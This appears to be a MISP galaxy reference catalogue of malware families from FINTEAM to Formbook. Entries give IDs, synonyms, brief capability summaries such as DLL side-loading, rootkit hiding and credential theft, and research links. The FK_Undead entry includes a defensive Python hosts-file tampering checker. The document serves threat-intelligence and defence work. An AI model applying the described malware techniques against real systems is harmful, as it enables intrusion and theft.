- http://www.msreverseengineering.com/blog/2018/1/23/a-walk-through-tutorial-with-code-on-statically-unpacking-the-finspy-vm-part-one-x86-deobfuscation - webarchive
- https://www.binarly.io/posts/Design_issues_of_modern_EDR%E2%80%99s_bypassing_ETW-based_solutions/index.html - webarchive
- https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - webarchive
- https://www.msreverseengineering.com/blog/2018/2/21/devirtualizing-finspy-phase-3-fixing-the-function-related-issues - webarchive
- https://securelist.com/apt-trends-report-q2-2019/91897/ - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf - webarchive
- https://artemonsecurity.blogspot.de/2017/01/finfisher-rootkit-analysis.html - webarchive
- https://securelist.com/finspy-unseen-findings/104322/ - webarchive
- https://netzpolitik.org/2022/nach-pfaendung-staatstrojaner-hersteller-finfisher-ist-geschlossen-und-bleibt-es-auch/ - webarchive
- https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/ - webarchive
- https://www.codeandsec.com/FinFisher-Malware-Analysis-Part-2 - webarchive
- https://www.msreverseengineering.com/blog/2018/2/21/devirtualizing-finspy-phase-4-second-attempt-at-devirtualization - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FINTEAM
Recently, Check Point researchers spotted a targeted attack against officials within government finance authorities and representatives in several embassies in Europe. The attack, which starts with a malicious attachment disguised as a top secret US document, weaponizes TeamViewer, the popular remote access and desktop sharing software, to gain full control of the infected computer. This is achieved by side-loading a malicious DLL alongside the legitimate TeamViewer executable.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FINTEAM.
Known Synonyms |
---|
TeamBot |
Internal MISP references
UUID 045469d0-5bb2-4ed9-9ee2-a0a08f437433
which can be used as unique global reference for FINTEAM
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Fireball
Internal MISP references
UUID 9ad28356-184c-4f02-89f5-1b70981598c3
which can be used as unique global reference for Fireball
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FireBird RAT
Internal MISP references
UUID 0d63d92b-6d4d-470d-9f13-acce0c76911c
which can be used as unique global reference for FireBird RAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Fire Chili
The purpose of this rootkit/driver is to hide and protect malicious artifacts (e.g. files, processes, registry keys and network connections) from user-mode components. According to FortiGuard Labs, the malware uses Direct Kernel Object Manipulation (DKOM), which depends on undocumented kernel structures and objects, which is why it has to target specific OS builds.
Internal MISP references
UUID 762ea155-1cec-4c67-9c4f-7e8f4c21e19e
which can be used as unique global reference for Fire Chili
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FireCrypt
Internal MISP references
UUID c4346ed0-1d74-4476-a78c-299bce0409bd
which can be used as unique global reference for FireCrypt
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FireMalv
Internal MISP references
UUID 9715c6bc-4b1e-49a2-b1d8-db4f4c4f042c
which can be used as unique global reference for FireMalv
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FirstRansom
Internal MISP references
UUID 1ab17959-6254-49af-af26-d34e87073e49
which can be used as unique global reference for FirstRansom
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FishMaster
A custom loader for Cobalt Strike.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FishMaster.
Known Synonyms |
---|
JollyJellyfish |
Internal MISP references
UUID dd73f0c7-3bc6-4dc9-a0b7-507490df2a84
which can be used as unique global reference for FishMaster
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.fishmaster - webarchive
- https://decoded.avast.io/luigicamastra/backdoored-client-from-mongolian-ca-monpass/ - webarchive
- https://media-exp1.licdn.com/dms/document/C561FAQHhWFRcWmdCPw/feedshare-document-pdf-analyzed/0/1639591145314?e=1658966400&v=beta&t=_uCcyEVg6b_VDiBTvWQIXtBOdQ1GQAAydqGyq62KA3E - webarchive
- https://speakerdeck.com/aragorntseng/winnti-is-coming-evolution-after-prosecution-at-hitcon2021 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FiveHands
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FiveHands.
Known Synonyms |
---|
Thieflock |
Internal MISP references
UUID 4d0dc7a3-07bf-4cb9-ba86-c7f154c6b678
which can be used as unique global reference for FiveHands
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.fivehands - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126b - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html - webarchive
- https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a - webarchive
- https://www.rewterz.com/rewterz-news/rewterz-threat-alert-financially-motivated-aggressive-group-carrying-out-ransomware-campaigns-active-iocs - webarchive
- https://www.cisa.gov/uscert/ncas/alerts/aa22-249a - webarchive
- https://research.nccgroup.com/2021/06/15/handy-guide-to-a-new-fivehands-ransomware-variant/ - webarchive
- https://www.bleepingcomputer.com/news/security/yanluowang-ransomware-operation-matures-with-experienced-affiliates/ - webarchive
- https://www.crowdstrike.com/blog/new-ransomware-variant-uses-golang-packer/ - webarchive
- https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire - webarchive
- https://www.esentire.com/blog/hacker-infrastructure-used-in-cisco-breach-discovered-attacking-a-top-workforce-management-corporation-russias-evil-corp-gang-suspected-reports-esentire - webarchive
- https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-ransomware-attacks-continue - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FK_Undead
This malware family is mainly distributed bundled with clients for various private (unofficial) game servers. It tampers with the user's network traffic through TDI filtering, DNS hijacking, HTTP(S) injection and HOSTS-file redirection, hijacking normal web page requests to designated private-server websites. To counter detection it blocks the packets that security software uses for cloud-based scanning and rewrites shutdown callbacks, among other techniques.
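As an added example (not part of the Malpedia entry and not code from any FK_Undead sample), the following Python check parses a hosts file and flags the two patterns the description mentions: hostnames pointed at an attacker-chosen address, and security-vendor domains sinkholed to loopback or 0.0.0.0 so that cloud lookups fail. The sample hosts content, the game domain and the AV domain are constructed placeholders; the watched-domain list is an assumption a defender would fill from their own environment.

```python
import ipaddress
import os
import platform

# Constructed sample hosts-file content; the game and AV domains are placeholders,
# not indicators from any real FK_Undead sample.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
# lines below mimic a private-server redirect plus AV cloud-lookup sinkholing
203.0.113.10    www.example-game.com
203.0.113.10    login.example-game.com
0.0.0.0         update.example-av.com
127.0.0.1       cloud.example-av.com   # trailing comment
"""

# Names that legitimately map to loopback in stock hosts files.
LOCAL_OK = {
    "localhost", "localhost.localdomain", "local", "broadcasthost",
    "ip6-localhost", "ip6-loopback", "ip6-localnet", "ip6-mcastprefix",
    "ip6-allnodes", "ip6-allrouters", "ip6-allhosts",
}


def parse_hosts(text):
    """Return (lineno, ip_address, hostname) tuples; comments and malformed lines are skipped."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        try:
            ip = ipaddress.ip_address(parts[0])
        except ValueError:
            continue  # first token is not an address; ignore the line
        for name in parts[1:]:
            entries.append((lineno, ip, name.lower()))
    return entries


def suspicious_entries(entries, watch_domains):
    """Flag sinkholing (non-local name -> loopback/0.0.0.0) and redirects of watched domains."""
    findings = []
    for lineno, ip, name in entries:
        if (ip.is_loopback or ip.is_unspecified) and name not in LOCAL_OK:
            findings.append((lineno, name, str(ip), "sinkholed"))
        elif any(name == d or name.endswith("." + d) for d in watch_domains):
            findings.append((lineno, name, str(ip), "redirected"))
    return findings


def default_hosts_path():
    """Location of the live hosts file on the current OS."""
    if platform.system() == "Windows":
        root = os.environ.get("SystemRoot", r"C:\Windows")
        return os.path.join(root, "System32", "drivers", "etc", "hosts")
    return "/etc/hosts"


def scan_hosts_file(path, watch_domains):
    """Run the check against a hosts file on disk."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return suspicious_entries(parse_hosts(fh.read()), watch_domains)


if __name__ == "__main__":
    # Demonstration on the constructed sample; swap in default_hosts_path() for a live check.
    for lineno, name, ip, kind in suspicious_entries(parse_hosts(SAMPLE_HOSTS), {"example-game.com"}):
        print(f"line {lineno}: {name} -> {ip} ({kind})")
```

The sinkhole rule will also fire on legitimate ad-blocking hosts lists, which map thousands of names to 0.0.0.0, so in practice restrict it to the domains your security tooling actually contacts rather than to every non-local name. The hosts file is only one of the four channels the description lists; TDI filtering, DNS hijacking and HTTP(S) injection leave no trace here and need driver and network-level inspection.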
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FK_Undead.
Known Synonyms |
---|
Undead |
Internal MISP references
UUID 97e332bf-e229-44e6-a48b-b5b45947a856
which can be used as unique global reference for FK_Undead
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Flagpro
According to PICUS, Flagpro is malware that collects information from the victim and executes commands in the victim's environment. It targets Japan, Taiwan, and English-speaking countries. When a victim is infected with Flagpro malware, the malware can do the following:
- Download and execute a tool
- Execute OS commands and send the results
- Collect and send Windows authentication information
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Flagpro.
Known Synonyms |
---|
BUSYICE |
Internal MISP references
UUID f6b10719-0f7a-45bc-9e47-1406b9966890
which can be used as unique global reference for Flagpro
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.flagpro - webarchive
- https://insight-jp.nttsecurity.com/post/102hf3q/flagpro-the-new-malware-used-by-blacktech - webarchive
- https://insight-jp.nttsecurity.com/post/102h7vx/blacktechflagpro - webarchive
- https://cyberandramen.net/2021/12/12/more-flagpro-more-problems/ - webarchive
- https://vblocalhost.com/uploads/VB2021-50.pdf - webarchive
- https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_8_hara_en.pdf - webarchive
- https://jp.security.ntt/resources/EN-BlackTech_2021.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Flame
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Flame.
Known Synonyms |
---|
sKyWIper |
Internal MISP references
UUID c40dbede-490f-4df4-a242-a2461e3cfc4e
which can be used as unique global reference for Flame
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.flame - webarchive
- https://securelist.com/the-flame-questions-and-answers-51/34344/ - webarchive
- https://github.com/juanandresgs/papers/raw/master/Flame%202.0%20Risen%20from%20the%20Ashes.pdf - webarchive
- https://storage.googleapis.com/chronicle-research/Flame%202.0%20Risen%20from%20the%20Ashes.pdf - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf - webarchive
- https://web.archive.org/web/20230416140914if_/http://www.chinaview.cn/20230411/4e0fa0f4fd1d408aaddeef8be63a4757/202304114e0fa0f4fd1d408aaddeef8be63a4757_20230411161526_0531.pdf - webarchive
- https://www.symantec.com/connect/blogs/flamer-recipe-bluetoothache - webarchive
- https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ce2df4da-afe9-4a24-b28c-0fb3ba671d95&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments - webarchive
- https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf - webarchive
- https://www.crysys.hu/publications/files/skywiper.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FLASHFLOOD
FLASHFLOOD will scan inserted removable drives for targeted files, and copy those files from the removable drive to the FLASHFLOOD-infected system. FLASHFLOOD may also log or copy additional data from the victim computer, such as system information or contacts.
Internal MISP references
UUID 0ce7e94e-da65-43e4-86f0-9a0bb21d1118
which can be used as unique global reference for FLASHFLOOD
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FlashDevelop
According to Intezer, this is a shellcode loader.
Internal MISP references
UUID 36e0e97f-fb94-4224-83a9-83274f274fe9
which can be used as unique global reference for FlashDevelop
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FlawedAmmyy
FlawedAmmyy is a well-known Remote Access Tool (RAT) attributed to the criminal group TA505 and used to take control of target machines. The name reflects its strong link with the leaked source code of Ammyy Admin, from which it took its main structure.
Internal MISP references
UUID 18419355-fd28-41a6-bffe-2df68a7166c4
which can be used as unique global reference for FlawedAmmyy
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedammyy - webarchive
- https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/ - webarchive
- https://threatrecon.nshc.net/2019/08/29/sectorj04-groups-increased-activity-in-2019/ - webarchive
- https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf - webarchive
- https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks - webarchive
- https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy/ - webarchive
- https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do - webarchive
- https://habr.com/ru/company/pt/blog/475328/ - webarchive
- https://www.proofpoint.com/us/threat-insight/post/ta505-begins-summer-campaigns-new-pet-malware-downloader-andromut-uae-south - webarchive
- https://www.sans.org/reading-room/whitepapers/reverseengineeringmalware/unpacking-decrypting-flawedammyy-38930 - webarchive
- https://attack.mitre.org/software/S0381/ - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505/ - webarchive
- https://www.proofpoint.com/us/threat-insight/post/ta505-abusing-settingcontent-ms-within-pdf-files-distribute-flawedammyy-rat - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://www.youtube.com/watch?v=N4f2e8Mygag - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-tahoe - webarchive
- https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat - webarchive
- https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-xakerske-ugrupovannya-u-rozpovsyudzhenni-virusu-shifruvalnika-ta-nanesenni-inozemnim-kompaniyam-piv-milyarda-dolariv-zbitkiv/ - webarchive
- https://secrary.com/ReversingMalware/AMMY_RAT_Downloader/ - webarchive
- https://intel471.com/blog/a-brief-history-of-ta505 - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FlawedGrace
According to ProofPoint, FlawedGrace is written in C++ and can be categorized as a Remote Access Trojan (RAT). It seems to have been developed mainly in the second half of 2017.
FlawedGrace uses a series of commands, provided below for reference:
- desktop_stat
- destroy_os
- target_download
- target_module_load
- target_module_load_external
- target_module_unload
- target_passwords
- target_rdp
- target_reboot
- target_remove
- target_script
- target_servers
- target_update
- target_upload
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FlawedGrace.
Known Synonyms |
---|
GraceWire |
Internal MISP references
UUID ef591233-4246-414b-9fbd-46838f3e5da2
which can be used as unique global reference for FlawedGrace
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedgrace - webarchive
- https://web.archive.org/web/20221115161556/https://blog.codsec.com/posts/malware/gracewire_adventure/ - webarchive
- https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/ - webarchive
- https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf - webarchive
- https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/ - webarchive
- https://www.msreverseengineering.com/blog/2021/3/2/an-exhaustively-analyzed-idb-for-flawedgrace - webarchive
- https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-solarwinds-serv-u-exploit-campaign/ - webarchive
- https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672 - webarchive
- https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/ - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf - webarchive
- https://blog.codsec.com/posts/malware/gracewire_adventure/ - webarchive
- https://www.msreverseengineering.com/blog/2019/1/14/a-quick-solution-to-an-ugly-reverse-engineering-problem - webarchive
- https://research.nccgroup.com/2021/12/01/tracking-a-p2p-network-related-with-ta505/ - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-tahoe - webarchive
- https://intel471.com/blog/a-brief-history-of-ta505 - webarchive
- https://www.rewterz.com/rewterz-news/rewterz-threat-alert-widely-abused-msix-app-installer-disabled-by-microsoft-active-iocs - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf - webarchive
- https://twitter.com/MsftSecIntel/status/1273359829390655488 - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/whatta-ta-ta505-ramps-activity-delivers-new-flawedgrace-variant - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
- https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FlexiSpy (Windows)
Internal MISP references
UUID 2431a1e5-4e64-454a-94c8-8a95f88d2d4a
which can be used as unique global reference for FlexiSpy (Windows)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FlokiBot
Internal MISP references
UUID 057ff707-a008-4ab8-8370-22b689ed3412
which can be used as unique global reference for FlokiBot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.floki_bot - webarchive
- https://www.flashpoint-intel.com/blog/cybercrime/floki-bot-emerges-new-malware-kit/ - webarchive
- https://www.cylance.com/en_us/blog/threat-spotlight-flokibot-pos-malware.html - webarchive
- https://www.flashpoint-intel.com/flokibot-curious-case-brazilian-connector/ - webarchive
- http://adelmas.com/blog/flokibot.php - webarchive
- https://www.arbornetworks.com/blog/asert/flokibot-flock-bots/ - webarchive
- https://blog.malwarebytes.com/threat-analysis/2016/11/floki-bot-and-the-stealthy-dropper/ - webarchive
- http://blog.talosintel.com/2016/12/flokibot-collab.html#more - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FlowCloud
Internal MISP references
UUID b018c5a7-ab70-4df0-b5aa-ceb1efd4b541
which can be used as unique global reference for FlowCloud
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.flowcloud - webarchive
- https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape - webarchive
- https://www.dragos.com/blog/industry-news/new-ics-threat-activity-group-talonite/ - webarchive
- https://nao-sec.org/2021/01/royal-road-redive.html - webarchive
- https://www.sstic.org/media/SSTIC2024/SSTIC-actes/la_retro-ingnierie_de_code_malveillant_dans_la_cti/SSTIC2024-Article-la_retro-ingnierie_de_code_malveillant_dans_la_cti_-_analyse_de_levolution_dune_chaine_dinfection-meslay.pdf - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/flowcloud-version-413-malware-analysis - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new - webarchive
- https://static.sstic.org/videos2024/1080p/la_retro-ingnierie_de_code_malveillant_dans_la_cti_-_analyse_de_levolution_dune_chaine_dinfection.mp4 - webarchive
- https://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/ - webarchive
- https://www.sstic.org/media/SSTIC2024/SSTIC-actes/la_retro-ingnierie_de_code_malveillant_dans_la_cti/SSTIC2024-Slides-la_retro-ingnierie_de_code_malveillant_dans_la_cti_-_analyse_de_levolution_dune_chaine_dinfection-meslay.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FlowerShop
Internal MISP references
UUID 0024c2d9-673f-4999-b240-4ae61a72c9b9
which can be used as unique global reference for FlowerShop
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Floxif
Internal MISP references
UUID b1b2e501-b68f-4e2e-ab98-85e9bda0fbcd
which can be used as unique global reference for Floxif
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Flusihoc
Available since 2015, Flusihoc is a versatile C++ malware capable of a variety of DDoS attacks as directed by a Command and Control server. Flusihoc communicates with its C2 via HTTP in plain text.
Internal MISP references
UUID 79e9df7d-abc8-45bd-abd3-be9b975f1a03
which can be used as unique global reference for Flusihoc
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FlyingDutchman
Internal MISP references
UUID a6f4d003-abe5-46ed-9e71-555b067f4d5a
which can be used as unique global reference for FlyingDutchman
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FlyStudio
Internal MISP references
UUID 19228908-ba8b-4718-86b3-209c7f1ae0bf
which can be used as unique global reference for FlyStudio
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Fobber
Internal MISP references
UUID bb836040-c161-4932-8f89-bc2ca2e8c1c0
which can be used as unique global reference for Fobber
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.fobber - webarchive
- http://blog.wizche.ch/fobber/malware/analysis/2015/08/10/fobber-encryption.html - webarchive
- https://www.govcert.admin.ch/blog/12/analysing-a-new-ebanking-trojan-called-fobber - webarchive
- http://www.govcert.admin.ch/downloads/whitepapers/govcertch_fobber_analysis.pdf - webarchive
- https://blog.malwarebytes.com/threat-analysis/2015/06/elusive-hanjuan-ek-caught-in-new-malvertising-campaign/ - webarchive
- http://byte-atlas.blogspot.ch/2015/08/knowledge-fragment-unwrapping-fobber.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FONIX
Internal MISP references
UUID f8d501bc-cf5a-4e19-a7fa-fb0aac18cc63
which can be used as unique global reference for FONIX
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ForestTiger
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ForestTiger.
Known Synonyms |
---|
ScoringMathTea |
Internal MISP references
UUID 685106fc-05ba-4d3b-90c3-91486986c35d
which can be used as unique global reference for ForestTiger
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.forest_tiger - webarchive
- https://www.virusbulletin.com/uploads/pdf/conference/vb2023/papers/Lazarus-campaigns-and-backdoors-in-2022-2023.pdf - webarchive
- https://securelist.com/the-lazarus-group-deathnote-campaign/109490/ - webarchive
- https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Formbook
FormBook contains a unique RunPE crypter with distinctive behavioral patterns that can be used for detection. It was initially called "Babushka Crypter" by Insidemalware.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Formbook.
Known Synonyms |
---|
win.xloader |
Internal MISP references
UUID 8378b417-605e-4196-b31f-a0c96d75aa50
which can be used as unique global reference for Formbook
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook - webarchive
- https://news.sophos.com/en-us/2020/05/14/raticate/ - webarchive
- https://forensicitguy.github.io/xloader-formbook-velvetsweatshop-spreadsheet/ - webarchive
- https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distribution-campaigns.html - webarchive
- https://www.zscaler.com/blogs/security-research/analysis-xloaders-c2-network-encryption - webarchive
- https://blogs.quickheal.com/formbook-malware-returns-new-variant-uses-steganography-and-in-memory-loading-of-multiple-stages-to-steal-data/ - webarchive
- https://securityintelligence.com/x-force/spam-trends-campaigns-senior-superlatives-2023/ - webarchive
- https://medium.com/@shaddy43/layers-of-deception-analyzing-the-complex-stages-of-xloader-4-3-malware-evolution-2dcb550b98d9 - webarchive
- https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/ - webarchive
- https://drive.google.com/file/d/1oxINyIJfMtv_upJqRK9vLSchIBaU8wiU/view - webarchive
- https://www.cyren.com/blog/articles/example-analysis-of-multi-component-malware - webarchive
- https://www.fortinet.com/blog/threat-research/excel-document-delivers-malware-by-exploiting-cve-2017-11882 - webarchive
- https://blog.netlab.360.com/purecrypter - webarchive
- https://blog.cyble.com/2022/07/01/xloader-returns-with-new-infection-technique/ - webarchive
- https://securityintelligence.com/posts/roboski-global-recovery-automation/ - webarchive
- https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware - webarchive
- https://tehtris.com/en/blog/cracking-formbook-malware-blind-deobfuscation-and-quick-response-techniques/ - webarchive
- https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/ - webarchive
- https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ipfs-a-new-data-frontier-or-a-new-cybercriminal-hideout - webarchive
- https://kienmanowar.wordpress.com/2023/07/06/quicknote-examining-formbook-campaign-via-phishing-emails/ - webarchive
- https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/ - webarchive
- https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/ - webarchive
- https://www.botconf.eu/wp-content/uploads/2018/12/2018-R-Jullian-In-depth-Formbook-Malware-Analysis.pdf - webarchive
- https://www.malwarebytes.com/blog/threat-intelligence/2022/20221121-threat-intel-report-final.pdf - webarchive
- https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html - webarchive
- https://www.malware-traffic-analysis.net/2023/06/05/index.html - webarchive
- https://www.zscaler.com/blogs/security-research/technical-analysis-xloaders-code-obfuscation-version-43 - webarchive
- https://youtu.be/aQwnHIlGSBM - webarchive
- https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-inside-formbook-infostealer/ - webarchive
- https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/ - webarchive
- https://www.fortinet.com/blog/threat-research/deep-analysis-formbook-new-variant-delivered-phishing-campaign-part-ii - webarchive
- https://www.ciphertechsolutions.com/roboski-global-recovery-automation/ - webarchive
- https://elastic.github.io/security-research/intelligence/2022/01/01.formbook-adopts-cabless-approach/article/ - webarchive
- https://tccontre.blogspot.com/2020/11/interesting-formbook-crypter.html - webarchive
- https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf - webarchive
- https://insights.oem.avira.com/a-new-technique-to-analyze-formbook-malware-infections/ - webarchive
- https://yoroi.company/research/office-documents-may-the-xll-technique-change-the-threat-landscape-in-2022/ - webarchive
- https://blog.talosintelligence.com/2018/06/my-little-formbook.html - webarchive
- https://blog.malwarebytes.com/threat-analysis/2021/05/revisiting-the-nsis-based-crypter/ - webarchive
- https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/ - webarchive
- https://github.com/itaymigdal/malware-analysis-writeups/blob/main/FormBook/FormBook.md - webarchive
- https://thisissecurity.stormshield.com/2018/03/29/in-depth-formbook-malware-analysis-obfuscation-and-process-injection/ - webarchive
- https://www.peerlyst.com/posts/how-to-analyse-formbook-a-new-malware-as-a-service-sudhendu?trk=explore_page_resources_recent - webarchive
- https://usualsuspect.re/article/formbook-hiding-in-plain-sight - webarchive
- https://isc.sans.edu/diary/26806 - webarchive
- https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors - webarchive
- https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord - webarchive
- https://cert.gov.ua/article/955924 - webarchive
- https://www.connectwise.com/resources/formbook-remcos-rat - webarchive
- https://link.medium.com/uaBiIXgUU8 - webarchive
